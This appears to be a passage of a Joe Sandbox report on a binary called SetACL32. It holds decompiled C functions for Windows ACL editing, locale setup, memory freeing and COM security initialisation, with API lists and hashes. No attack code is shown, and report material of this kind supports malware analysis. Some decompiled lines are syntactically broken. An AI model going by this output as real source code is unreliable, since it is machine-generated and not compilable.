															_t74 = AddAccessAllowedAce;
															continue;
														}
													}
												} else {
													_push(_a12);
													_push(_v40);
													_push(2);
													_push(_t116);
													if( *_t74() == 0 || GetAce(_t116, _t97,  &_v28) == 0) {
														goto L24;
													} else {
														_v21 = 1;
														 *_v28 = _v22;
														 *((char*)(_v28 + 1)) = _v23;
														goto L16;
													}
												}
												goto L28;
											}
										}
									}
								} else {
									 *((intOrPtr*)(_t113 + 0x10)) = GetLastError();
									goto L27;
								}
							} else {
								 *((intOrPtr*)(_t113 + 0x10)) = GetLastError();
								goto L27;
							}
						} else {
							 *((intOrPtr*)(_t113 + 0x10)) = GetLastError();
							goto L27;
						}
					} else {
						 *((intOrPtr*)(_t113 + 0x10)) = GetLastError();
						goto L27;
					}
				}
				L28:
				_t101 = _a12;
				if(_a12 != 0) {
					E012D3434(_t101);
				}
				_pop(_t114);
				_pop(_t117);
				return E012CAE19(_t116, _t97, _v8 ^ _t119, _t111, _t114, _t117);
			}































              0x012c3120
              0x012c3126
              0x012c312d
              0x012c3131
              0x012c3134
              0x012c3137
              0x012c313a
              0x012c313f
              0x012c3146
              0x012c314d
              0x012c3156
              0x012c315a
              0x012c331b
              0x012c331b
              0x012c316f
              0x012c316f
              0x012c3180
              0x012c3190
              0x012c3197
              0x012c31a0
              0x012c31a3
              0x012c31ae
              0x012c31cf
              0x012c31ee
              0x012c31f0
              0x012c31f6
              0x012c31f8
              0x012c31fd
              0x012c3219
              0x012c32eb
              0x012c32f2
              0x012c32f5
              0x012c32fa
              0x00000000
              0x012c321f
              0x012c3221
              0x012c3223
              0x012c3226
              0x012c322b
              0x012c3231
              0x012c32c9
              0x012c32c9
              0x012c32cc
              0x012c32cf
              0x012c32d1
              0x012c32d6
              0x00000000
              0x012c32ff
              0x012c3305
              0x012c330d
              0x00000000
              0x012c330d
              0x00000000
              0x00000000
              0x012c3237
              0x012c323a
              0x012c3278
              0x012c3288
              0x00000000
              0x012c32a2
              0x012c32a5
              0x012c32a6
              0x012c32a9
              0x012c32af
              0x012c32bf
              0x012c3310
              0x012c3319
              0x00000000
              0x00000000
              0x012c32c1
              0x012c32c1
              0x012c32c4
              0x00000000
              0x012c32c4
              0x012c32b1
              0x012c32b1
              0x00000000
              0x012c32b1
              0x012c32af
              0x012c323c
              0x012c323c
              0x012c323f
              0x012c3242
              0x012c3244
              0x012c3249
              0x00000000
              0x012c3263
              0x012c3269
              0x012c326d
              0x012c3275
              0x00000000
              0x012c3275
              0x012c3249
              0x00000000
              0x012c323a
              0x012c3237
              0x012c3231
              0x012c31ff
              0x012c3205
              0x00000000
              0x012c3205
              0x012c31d1
              0x012c31d7
              0x00000000
              0x012c31d7
              0x012c31b0
              0x012c31b6
              0x00000000
              0x012c31b6
              0x012c3182
              0x012c3188
              0x00000000
              0x012c3188
              0x012c3180
              0x012c331d
              0x012c331d
              0x012c3322
              0x012c3325
              0x012c332a
              0x012c3332
              0x012c3333
              0x012c333f

              APIs
              • IsValidAcl.ADVAPI32(?,?,?,00000000), ref: 012C3161
              • GetAce.ADVAPI32(?,?,00000000,?,?,00000000), ref: 012C3178
              • GetLastError.KERNEL32(?,?,00000000), ref: 012C3182
              • DeleteAce.ADVAPI32(?,?,?,?,00000000), ref: 012C31A6
              • GetLastError.KERNEL32(?,?,00000000), ref: 012C31B0
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorLast$DeleteValid
              • String ID: @Mhv
              • API String ID: 2912457363-3595611156
              • Opcode ID: 961cd7b8da197f48a604f8c37171ec313256c7df77b04127ff4ad6bf0f2c86e6
              • Instruction ID: bba28b55c284a39cd2699b0f72bfade42c57083a8d243717a478518fb166638d
              • Opcode Fuzzy Hash: 961cd7b8da197f48a604f8c37171ec313256c7df77b04127ff4ad6bf0f2c86e6
              • Instruction Fuzzy Hash: 38618370A142569FDF21CFA4DC89ABF7FF8BF09700F048958EA01A7241D7749944CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C2F70 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 140COMMON
              Download Yara Rule
              C-Code - Quality: 84%
              			E012C2F70(signed short __ecx, void* __edx, struct _ACL* _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				void _v20;
				void* _v24;
				signed short _v28;
				void* _v32;
				struct _ACL* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				signed short _t67;
				void* _t76;
				void* _t78;
				long _t81;
				long _t82;
				struct _ACL* _t83;
				struct _ACL* _t84;
				signed int _t85;
				void* _t86;

				_t76 = __edx;
				_t36 =  *0x1309018; // 0xedd8d3b4
				_v8 = _t36 ^ _t85;
				_t83 = _a4;
				_t67 = __ecx;
				_v28 = __ecx;
				asm("xorps xmm0, xmm0");
				_v36 = _t83;
				asm("movq [ebp-0x10], xmm0");
				_v12 = 0;
				_v24 = 0;
				_v32 = 0;
				if(_t83 == 0 || IsValidAcl(_t83) == 0) {
					L18:
					_t84 = 0;
				} else {
					if(GetAclInformation(_t83,  &_v20, 0xc, 2) != 0) {
						_t81 = _v16 + 8 + GetLengthSid(_a12);
						_push(_t81);
						_t84 = E012D4011();
						_t86 = _t86 + 4;
						if(_t84 != 0) {
							if(InitializeAcl(_t84, _t81, 2) != 0) {
								_t67 = 0;
								if(_v20 <= 0) {
									L17:
									if(IsValidAcl(_t84) == 0) {
										goto L18;
									}
								} else {
									_t82 = 0;
									while(GetAce(_v36, _t82,  &_v24) != 0 && AddAce(_t84, 2, 0xffffffff, _v24,  *(_v24 + 2) & 0x0000ffff) != 0) {
										if(_t82 != _a8) {
											L16:
											_t67 = _t67 + 1;
											_t82 = _t67 & 0x0000ffff;
											if(_t82 < _v20) {
												continue;
											} else {
												goto L17;
											}
										} else {
											if(AddAccessAllowedAce(_t84, 2,  *(_v24 + 4), _a12) == 0 || GetAce(_t84, _t82 + 1,  &_v32) == 0) {
												break;
											} else {
												 *_v32 =  *_v24 & 0x000000ff;
												 *((char*)(_v32 + 1)) =  *(_v24 + 1) & 0x000000ff;
												goto L16;
											}
										}
										goto L19;
									}
									 *((intOrPtr*)(_v28 + 0x10)) = GetLastError();
									E012D3434(_t84);
									_t86 = _t86 + 4;
									goto L18;
								}
							} else {
								 *((intOrPtr*)(_t67 + 0x10)) = GetLastError();
								E012D3434(_t84);
								_t86 = _t86 + 4;
								goto L18;
							}
						} else {
							 *((intOrPtr*)(_t67 + 0x10)) = GetLastError();
							goto L18;
						}
					} else {
						 *((intOrPtr*)(_t67 + 0x10)) = GetLastError();
						goto L18;
					}
				}
				L19:
				_t69 = _a12;
				if(_a12 != 0) {
					E012D3434(_t69);
				}
				_pop(_t78);
				return E012CAE19(_t84, _t67, _v8 ^ _t85, _t76, _t78, _t84);
			}
























              0x012c2f70
              0x012c2f76
              0x012c2f7d
              0x012c2f82
              0x012c2f85
              0x012c2f87
              0x012c2f8a
              0x012c2f8d
              0x012c2f90
              0x012c2f95
              0x012c2f9c
              0x012c2fa3
              0x012c2fad
              0x012c30d3
              0x012c30d3
              0x012c2fc2
              0x012c2fd3
              0x012c2ff2
              0x012c2ff4
              0x012c2ffa
              0x012c2ffc
              0x012c3001
              0x012c301d
              0x012c3036
              0x012c303b
              0x012c30c8
              0x012c30d1
              0x00000000
              0x00000000
              0x012c3041
              0x012c3041
              0x012c3043
              0x012c3078
              0x012c30bb
              0x012c30bb
              0x012c30bc
              0x012c30c2
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c307a
              0x012c308e
              0x00000000
              0x012c30a3
              0x012c30ac
              0x012c30b8
              0x00000000
              0x012c30b8
              0x012c308e
              0x00000000
              0x012c3078
              0x012c3104
              0x012c3107
              0x012c310c
              0x00000000
              0x012c310c
              0x012c301f
              0x012c3026
              0x012c3029
              0x012c302e
              0x00000000
              0x012c302e
              0x012c3003
              0x012c3009
              0x00000000
              0x012c3009
              0x012c2fd5
              0x012c2fdb
              0x00000000
              0x012c2fdb
              0x012c2fd3
              0x012c30d5
              0x012c30d5
              0x012c30da
              0x012c30dd
              0x012c30e2
              0x012c30ea
              0x012c30f7

              APIs
              • IsValidAcl.ADVAPI32(?,?,?,00000000), ref: 012C2FB4
              • GetAclInformation.ADVAPI32(?,00000000,0000000C,00000002,?,?,00000000), ref: 012C2FCB
              • GetLastError.KERNEL32(?,?,00000000), ref: 012C2FD5
              • GetLengthSid.ADVAPI32(00000000,?,?,00000000), ref: 012C2FE6
              • GetLastError.KERNEL32(00000000), ref: 012C3003
              • GetLastError.KERNEL32 ref: 012C30FA
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorLast$InformationLengthValid
              • String ID: @Mhv
              • API String ID: 2808191216-3595611156
              • Opcode ID: 41509e234af9a8d5e4edca2da42740ec3ccb834873d1f3ffb6ece25ca4d86c6c
              • Instruction ID: bc062ccb3521a41b5cb5c5843f939907549986f3b0af99b5070b610e34c44df0
              • Opcode Fuzzy Hash: 41509e234af9a8d5e4edca2da42740ec3ccb834873d1f3ffb6ece25ca4d86c6c
              • Instruction Fuzzy Hash: 04419672A102169FDB21CF64EC49ABF7BF8FF08700F05465DEA02A7241D7759A05CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C9350 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 229COMMON
              Download Yara Rule
              C-Code - Quality: 21%
              			E012C9350(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t46;
				void* _t51;
				void* _t55;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t67;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				void* _t86;
				void* _t87;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t149;
				void* _t152;
				intOrPtr* _t153;
				intOrPtr* _t155;
				intOrPtr* _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t159;
				intOrPtr* _t160;
				signed int _t162;

				_push(0xffffffff);
				_push(0x12ecdcd);
				_push( *[fs:0x0]);
				_push(_t86);
				_push(_t152);
				_t46 =  *0x1309018; // 0xedd8d3b4
				_push(_t46 ^ _t162);
				 *[fs:0x0] =  &_v16;
				_t149 = __ecx;
				_push(1);
				_v8 = 0;
				_t153 = E012C9DCB(_t86, __ecx, _t152, __eflags);
				_v20 = _t153;
				_v8 = 1;
				_push( &_v24);
				_t51 = E01298900(_t149, L"NT AUTHORITY");
				_v8 = 0xffffffff;
				_t87 = _t51;
				if(_t153 != 0) {
					_t84 =  *((intOrPtr*)( *_t153 + 8))();
					if(_t84 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t84))))(1);
					}
				}
				_t175 = _t87;
				if(_t87 != 0) {
					L29:
					 *[fs:0x0] = _v16;
					return 1;
				} else {
					_push(1);
					_v8 = 2;
					_t155 = E012C9DCB(_t87, _t149, _t153, _t175);
					_v20 = _t155;
					_v8 = 3;
					_push( &_v24);
					_t55 = E01298900(_t149, L"NT SERVICE");
					_v8 = 0xffffffff;
					_t89 = _t55;
					if(_t155 != 0) {
						_t82 =  *((intOrPtr*)( *_t155 + 8))();
						if(_t82 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t82))))(1);
						}
					}
					_t178 = _t89;
					if(_t89 != 0) {
						goto L29;
					} else {
						_push(1);
						_v8 = 4;
						_t156 = E012C9DCB(_t89, _t149, _t155, _t178);
						_v20 = _t156;
						_v8 = 5;
						_t58 = E012C9610(_t149,  &_v24);
						_v8 = 0xffffffff;
						_t90 = _t58;
						if(_t156 != 0) {
							_t80 =  *((intOrPtr*)( *_t156 + 8))();
							if(_t80 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t80))))(1);
							}
						}
						_t181 = _t90;
						if(_t90 != 0) {
							goto L29;
						} else {
							_push(1);
							_v8 = 6;
							_t157 = E012C9DCB(_t90, _t149, _t156, _t181);
							_v20 = _t157;
							_v8 = 7;
							_push( &_v24);
							_t61 = E01298900(_t149, L"NT VIRTUAL MACHINE");
							_v8 = 0xffffffff;
							_t91 = _t61;
							if(_t157 != 0) {
								_t78 =  *((intOrPtr*)( *_t157 + 8))();
								if(_t78 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t78))))(1);
								}
							}
							_t184 = _t91;
							if(_t91 != 0) {
								goto L29;
							} else {
								_push(1);
								_v8 = 8;
								_t158 = E012C9DCB(_t91, _t149, _t157, _t184);
								_v20 = _t158;
								_v8 = 9;
								_push( &_v24);
								_t64 = E01298900(_t149, L"IIS AppPool");
								_v8 = 0xffffffff;
								_t92 = _t64;
								if(_t158 != 0) {
									_t76 =  *((intOrPtr*)( *_t158 + 8))();
									if(_t76 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)( *_t76))))(1);
									}
								}
								_t187 = _t92;
								if(_t92 != 0) {
									goto L29;
								} else {
									_push(1);
									_v8 = 0xa;
									_t159 = E012C9DCB(_t92, _t149, _t158, _t187);
									_v20 = _t159;
									_v8 = 0xb;
									_push( &_v24);
									_t67 = E01298900(_t149, L"WINDOW MANAGER");
									_v8 = 0xffffffff;
									_t93 = _t67;
									if(_t159 != 0) {
										_t74 =  *((intOrPtr*)( *_t159 + 8))();
										if(_t74 != 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_t74))))(1);
										}
									}
									_t190 = _t93;
									if(_t93 != 0) {
										goto L29;
									} else {
										_push(1);
										_v8 = 0xc;
										_t160 = E012C9DCB(_t93, _t149, _t159, _t190);
										_v20 = _t160;
										_v8 = 0xd;
										_push( &_v24);
										_t94 = E01298900(_t149, L"Font Driver Host");
										if(_t160 != 0) {
											_t72 =  *((intOrPtr*)( *_t160 + 8))();
											if(_t72 != 0) {
												 *((intOrPtr*)( *_t72))(1);
											}
										}
										if(_t94 != 0) {
											goto L29;
										} else {
											 *[fs:0x0] = _v16;
											return 0;
										}
									}
								}
							}
						}
					}
				}
			}











































              0x012c9353
              0x012c9355
              0x012c9360
              0x012c9364
              0x012c9365
              0x012c9367
              0x012c936e
              0x012c9372
              0x012c9378
              0x012c937a
              0x012c937c
              0x012c9388
              0x012c938a
              0x012c9390
              0x012c9397
              0x012c939f
              0x012c93a7
              0x012c93ae
              0x012c93b2
              0x012c93b8
              0x012c93bd
              0x012c93c7
              0x012c93c7
              0x012c93bd
              0x012c93c9
              0x012c93cb
              0x012c95d9
              0x012c95de
              0x012c95ec
              0x012c93d1
              0x012c93d1
              0x012c93d3
              0x012c93df
              0x012c93e1
              0x012c93e7
              0x012c93ee
              0x012c93f6
              0x012c93fe
              0x012c9405
              0x012c9409
              0x012c940f
              0x012c9414
              0x012c941e
              0x012c941e
              0x012c9414
              0x012c9420
              0x012c9422
              0x00000000
              0x012c9428
              0x012c9428
              0x012c942a
              0x012c9436
              0x012c9438
              0x012c943e
              0x012c9448
              0x012c9450
              0x012c9457
              0x012c945b
              0x012c9461
              0x012c9466
              0x012c9470
              0x012c9470
              0x012c9466
              0x012c9472
              0x012c9474
              0x00000000
              0x012c947a
              0x012c947a
              0x012c947c
              0x012c9488
              0x012c948a
              0x012c9490
              0x012c9497
              0x012c949f
              0x012c94a7
              0x012c94ae
              0x012c94b2
              0x012c94b8
              0x012c94bd
              0x012c94c7
              0x012c94c7
              0x012c94bd
              0x012c94c9
              0x012c94cb
              0x00000000
              0x012c94d1
              0x012c94d1
              0x012c94d3
              0x012c94df
              0x012c94e1
              0x012c94e7
              0x012c94ee
              0x012c94f6
              0x012c94fe
              0x012c9505
              0x012c9509
              0x012c950f
              0x012c9514
              0x012c951e
              0x012c951e
              0x012c9514
              0x012c9520
              0x012c9522
              0x00000000
              0x012c9528
              0x012c9528
              0x012c952a
              0x012c9536
              0x012c9538
              0x012c953e
              0x012c9545
              0x012c954d
              0x012c9555
              0x012c955c
              0x012c9560
              0x012c9566
              0x012c956b
              0x012c9575
              0x012c9575
              0x012c956b
              0x012c9577
              0x012c9579
              0x00000000
              0x012c957b
              0x012c957b
              0x012c957d
              0x012c9589
              0x012c958b
              0x012c9591
              0x012c9598
              0x012c95a8
              0x012c95ac
              0x012c95b2
              0x012c95b7
              0x012c95bf
              0x012c95bf
              0x012c95b7
              0x012c95c3
              0x00000000
              0x012c95c5
              0x012c95ca
              0x012c95d8
              0x012c95d8
              0x012c95c3
              0x012c9579
              0x012c9522
              0x012c94cb
              0x012c9474
              0x012c9422

              APIs
              • std::locale::_Init.LIBCPMT ref: 012C9383
                • Part of subcall function 012C9DCB: __EH_prolog3.LIBCMT ref: 012C9DD2
                • Part of subcall function 012C9DCB: std::_Lockit::_Lockit.LIBCPMT ref: 012C9DDD
                • Part of subcall function 012C9DCB: std::locale::_Setgloballocale.LIBCPMT ref: 012C9DF8
                • Part of subcall function 012C9DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 012C9E4E
              • std::locale::_Init.LIBCPMT ref: 012C93DA
              • std::locale::_Init.LIBCPMT ref: 012C9431
              • std::locale::_Init.LIBCPMT ref: 012C9483
              • std::locale::_Init.LIBCPMT ref: 012C94DA
              • std::locale::_Init.LIBCPMT ref: 012C9531
              • std::locale::_Init.LIBCPMT ref: 012C9584
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: std::locale::_$Init$Lockitstd::_$H_prolog3Lockit::_Lockit::~_Setgloballocale
              • String ID: Font Driver Host$IIS AppPool$NT AUTHORITY$NT SERVICE$NT VIRTUAL MACHINE$WINDOW MANAGER
              • API String ID: 1949052339-1101167501
              • Opcode ID: 403bbcb0379a5e1a84d953ce85025fd3b9e0fee350e75d58899e8105706c2187
              • Instruction ID: ba99c48069861f01eb323481374f115d9bb6e24ad44fbc6715c627ab6d304d81
              • Opcode Fuzzy Hash: 403bbcb0379a5e1a84d953ce85025fd3b9e0fee350e75d58899e8105706c2187
              • Instruction Fuzzy Hash: E681F1B0B016069FDF20DF68E8507AEB7A1AF95B18F14435CDA01AB3C5DB729A45CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D85DB Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E012D85DB(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x1309128) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E012D800F(_t46);
							E012D7472( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E012D800F(_t47);
							E012D7927( *((intOrPtr*)(_t74 + 0x88)));
						}
						E012D800F( *((intOrPtr*)(_t74 + 0x7c)));
						E012D800F( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E012D800F( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E012D800F( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E012D800F( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E012D800F( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E012D874C( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x1309268) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E012D800F(_t31);
							E012D800F( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xfffffe73
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E012D800F(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E012D800F(_t74);
			}















              0x012d85e3
              0x012d85e7
              0x012d85ef
              0x012d85f8
              0x012d85fd
              0x012d8604
              0x012d860c
              0x012d8614
              0x012d861f
              0x012d8625
              0x012d8626
              0x012d862e
              0x012d8636
              0x012d8641
              0x012d8647
              0x012d864b
              0x012d8656
              0x012d865c
              0x012d85fd
              0x012d865d
              0x012d8665
              0x012d8678
              0x012d868b
              0x012d8699
              0x012d86a4
              0x012d86a9
              0x012d86b2
              0x012d86ba
              0x012d86bb
              0x012d86c1
              0x012d86c4
              0x012d86c7
              0x012d86ce
              0x012d86d0
              0x012d86d4
              0x012d86dc
              0x012d86e3
              0x012d86e9
              0x012d86ea
              0x012d86ea
              0x012d86f1
              0x012d86f3
              0x012d86f3
              0x012d86f8
              0x012d8700
              0x012d8705
              0x012d8706
              0x012d8706
              0x012d8709
              0x012d870c
              0x012d870f
              0x012d8712
              0x012d8712
              0x012d8722

              APIs
              • ___free_lconv_mon.LIBCMT ref: 012D861F
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D748F
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D74A1
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D74B3
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D74C5
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D74D7
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D74E9
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D74FB
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D750D
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D751F
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D7531
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D7543
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D7555
                • Part of subcall function 012D7472: _free.LIBCMT ref: 012D7567
              • _free.LIBCMT ref: 012D8614
                • Part of subcall function 012D800F: HeapFree.KERNEL32(00000000,00000000,?,012D6ACD), ref: 012D8025
                • Part of subcall function 012D800F: GetLastError.KERNEL32(?,?,012D6ACD), ref: 012D8037
              • _free.LIBCMT ref: 012D8636
              • _free.LIBCMT ref: 012D864B
              • _free.LIBCMT ref: 012D8656
              • _free.LIBCMT ref: 012D8678
              • _free.LIBCMT ref: 012D868B
              • _free.LIBCMT ref: 012D8699
              • _free.LIBCMT ref: 012D86A4
              • _free.LIBCMT ref: 012D86DC
              • _free.LIBCMT ref: 012D86E3
              • _free.LIBCMT ref: 012D8700
              • _free.LIBCMT ref: 012D8718
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              • Opcode ID: ffd0982e201f17cc7cccd303533381f4f7ff291851561b46f0a7ff657fcfcec6
              • Instruction ID: ee87913ba2e4d1f3186a8e37c5fd1443375213287a06e26d691f567ac5073c2b
              • Opcode Fuzzy Hash: ffd0982e201f17cc7cccd303533381f4f7ff291851561b46f0a7ff657fcfcec6
              • Instruction Fuzzy Hash: D3316E726203029FEB31AB3DD844B6A77E9EF14321F205429E259D7191DF31E880DB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C3AF0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 282commemoryCOMMON
              Download Yara Rule
              C-Code - Quality: 23%
              			E012C3AF0(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, char _a4, intOrPtr _a20, signed int _a24) {
				char _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v44;
				void* _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				signed int _t81;
				signed int _t82;
				void* _t90;
				signed int _t92;
				intOrPtr _t95;
				void* _t99;
				void* _t101;
				signed int _t103;
				signed int _t108;
				intOrPtr* _t109;
				intOrPtr* _t112;
				signed int _t114;
				intOrPtr _t122;
				intOrPtr _t126;
				signed int _t133;
				void* _t134;
				char _t144;
				intOrPtr _t145;
				intOrPtr _t152;
				intOrPtr _t155;
				signed int _t158;
				intOrPtr* _t160;
				intOrPtr* _t161;
				signed int _t163;
				void* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t170;
				void* _t171;
				void* _t172;
				intOrPtr _t173;
				signed int _t177;
				void* _t180;

				_t175 = _t177;
				_push(0xffffffff);
				_push(0x12ec70d);
				_push( *[fs:0x0]);
				_t81 =  *0x1309018; // 0xedd8d3b4
				_t82 = _t81 ^ _t177;
				_v20 = _t82;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t82);
				 *[fs:0x0] =  &_v16;
				_v60 = __edx;
				_v56 = __ecx;
				_v8 = 0;
				_push(1);
				_v8 = 1;
				_t170 = E012C9DCB(0, __edi, __esi, __eflags);
				_v68 = _t170;
				_v8 = 2;
				_v44 = 0;
				_v44 = 0;
				_t137 =  <  ? _a20 : 2;
				_t87 =  >=  ? _a4 :  &_a4;
				_v28 = 0;
				_v24 = 7;
				E012A1EE0(0,  &_v44, __edx, __edi, _t170,  >=  ? _a4 :  &_a4,  <  ? _a20 : 2);
				_v8 = 3;
				_push( &_v72);
				_t90 = E01298900( &_v44, L"\\\\");
				_t180 = _t177 - 0x44 + 8;
				_v8 = 2;
				_t158 = _v24;
				_t133 = 0 | _t90 == 0x00000000;
				if(_t158 < 8) {
					L4:
					_t91 = 0;
					_v28 = 0;
					_v24 = 7;
					_v44 = 0;
					_v8 = 0;
					if(_t170 != 0) {
						_t91 =  *((intOrPtr*)( *_t170 + 8))();
						if(0 != 0) {
							_t159 =  *0x00000000;
							_push(1);
							_t91 =  *( *0x00000000)();
						}
					}
					if(_t133 == 0) {
						L13:
						_v52 = 0;
						_v48 = 0;
						__imp__CoInitialize(0);
						_t166 = _t91;
						if(_t166 >= 0) {
							L16:
							__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 2, 0);
							_t167 = _t91;
							if(_t167 >= 0 || _t167 == 0x80010119) {
								_t92 =  &_v52;
								__imp__CoCreateInstance(0x12ef698, 0, 1, 0x12ef6a8, _t92);
								_t167 = _t92;
								if(_t92 >= 0) {
									_t101 =  >=  ? _a4 :  &_a4;
									__imp__#4(_t101, _a20);
									_t160 = _v52;
									_t172 = _t101;
									_t145 =  *_t160;
									_t103 =  *((intOrPtr*)(_t145 + 0xc))(_t160, _t172, 0, 0, 0, 0, 0, 0,  &_v48);
									_t167 = _t103;
									__imp__#6(_t172);
									if(_t103 >= 0) {
